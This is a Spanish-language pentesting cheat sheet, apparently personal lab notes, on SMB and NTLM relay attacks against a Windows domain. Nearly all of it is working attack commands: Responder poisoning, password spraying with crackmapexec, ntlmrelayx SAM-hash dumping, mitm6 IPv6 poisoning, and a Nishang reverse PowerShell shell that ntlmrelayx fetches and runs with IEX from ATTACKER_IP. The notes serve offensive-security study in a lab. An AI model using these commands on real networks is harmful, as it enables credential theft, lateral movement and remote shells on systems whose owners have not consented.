Samba & NTML Relay

IPv4

Samba Relay

sudo responder -I ens37 -dw

Podemos tratar de crackear los hahes con john john -w:/rocku.txt hashes

Password Spraying

crackmapexec smb 100.100.100.0/24 -u 'Cbollin' -p 'Password1'

Aqui probamos la contraseña de un usuario en especifico en todos los usuarios del rango de ip en el servico SMB Podemos comprobar si tenemos permisos administrativos sorbre algun usuario

NTML Relay

Primero Off SMB & HTTP en el /usr/share/responder/Responder.conf

1º Defino un archivo targets.txt con las ips 2º Ahora lanzo el responder

sudo responder -I ens37 -dw

3º Lanzo el ntlmrelayx con el archivo targets

sudo su && ntlmrelayx.py -tf targets.txt -smb2support

Existen dos equipos cebollin y champi, cebollin es admin sobre champi y yo lo he sabido haciendo un password spraying, ahora quiero hackear a champi asi que lo meto en la lista del target.

Enveneno el trafico con el responder y digo que el samba soy yo (ya que no esta firmado) y cuando cebollin busque algo a nivel de red, autenticate contra mi, pero ahora va a aprovechar sus credenciales privilegiadas para redirigir esa autenticacion sobre el equipo victima champi y dumpear la sam hash del equipo

Y ahora podríamos hacer passthehash

Ejecución de comandos

Y dentro utilizamos la shell Invoke-PowershellTCP.ps1

git clone git clone https://github.com/samratashok/nishang
cp /opt/nishang/Shells/Invoke-PowerShellTcp.ps1 .
mv Invoke-PowerShellTcp.ps1 PS.ps1

Y añadimos esta linea al final del PS.ps1 --MODIFICAR--

echo "Invoke-PowerShellTcp -Reverse -IPAddress ATTACKER_IP -Port ATTACKER_PORT" >> PS.ps1 

Ahora me levanto un servidor web en python y me pongo a la escucha por el puerto

sudo python3 -m http.server
###
rlwrap -cAr nc -lvnp 1234

Y ahora levantamos el responder y decimos con ntlmrelayx, oye ya no quiero que me dumppes la sam de la victima si no que me ejcutes este comando

sudo responder -I ens37 -dw 
###
ntlmrelayx.py -tf targets.txt -smb2support -c "powershell IEX(New-Object Net.WebClient).downloadString('http://ATTACKER_IP:8000/PS.ps1')"

IPv6

Mitm6

mitm6 -d deimcorp.local

Envenenamos el dominio de la empresa

ntlmrelayx.py -6 -wh ATTACKER_IP -t smb://VICTIM_IP -socks -debug -smb2support

Este hace como una terminal, y cuando un usuario busque algo a nivel de red local intenta ver si tiene permisos de administrador, se puede ver las intercepciones con un socks

Tras un rato, pillamos esto:

Vemos que el usuario cbollin es admin ante ese equipo

Configuracion del /etc/proxychains4.conf

#dynamic_chain
strict_chain
proxy_dns
tcp_read_time_out 15000
tcp_connect_time_out 8000

[ProxyList]
socks4  127.0.0.1 1080

#socks5  127.0.0.1 1082
#socks5  127.0.0.1 1081
#socks5  127.0.0.1 1080

Ahora como yo tengo un relayinc de una credencial de usario administrador sobre esa maquina, puedo tirar de proxychains

proxychains crackmapexec smb 100.100.100.130 -u 'champi' -p 'loquesea' -d 'deimcorp.local' --sam 2>/dev/null 

Last updated